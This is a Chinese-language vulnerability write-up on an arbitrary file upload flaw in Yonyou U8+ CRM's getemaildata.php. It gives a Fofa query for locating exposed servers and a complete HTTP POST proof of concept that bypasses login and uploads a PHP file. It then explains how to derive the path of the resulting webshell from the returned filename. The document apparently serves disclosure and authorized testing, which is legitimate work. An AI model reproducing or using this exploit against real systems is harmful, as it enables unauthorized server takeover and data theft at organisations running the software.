用友U8+ CRM任意文件上传漏洞
- 免责声明
- 漏洞描述
- 漏洞影响
- 漏洞危害
- 网络测绘
- Fofa: body="用友U8CRM"
- 漏洞复现
- 1. 构造poc
- 2. 复现
- 3. 访问webshell
免责声明
仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。
漏洞描述
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。
漏洞影响
用友 U8 CRM
漏洞危害
用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。
网络测绘
Fofa: body=“用友U8CRM”
漏洞复现
1. 构造poc
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1327449377326679018968432014
Content-Length: 243
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1-----------------------------1327449377326679018968432014
Content-Disposition: form-data; name="file"; filename="a.php "
Content-Type: application/octet-stream<?php phpinfo();?>
-----------------------------1327449377326679018968432014--
2. 复现
3. 访问webshell
上传之后返回的路径为:E:\\U8SOFT\\turbocrm70\\code\\www\\tmpfile\\mhtCA53.tmp.mht
直接访问这个文件不解析,需要访问另一个文件
该webshell上传后会在目录下生成两个文件:tmp.mht和tmp.php文件
访问文件的格式为upd***.tmp.php
*号部分为返回的文件名的十六进制减1
所以,webshell地址为:
http://ip:port/tmpfile/updCA52.tmp.php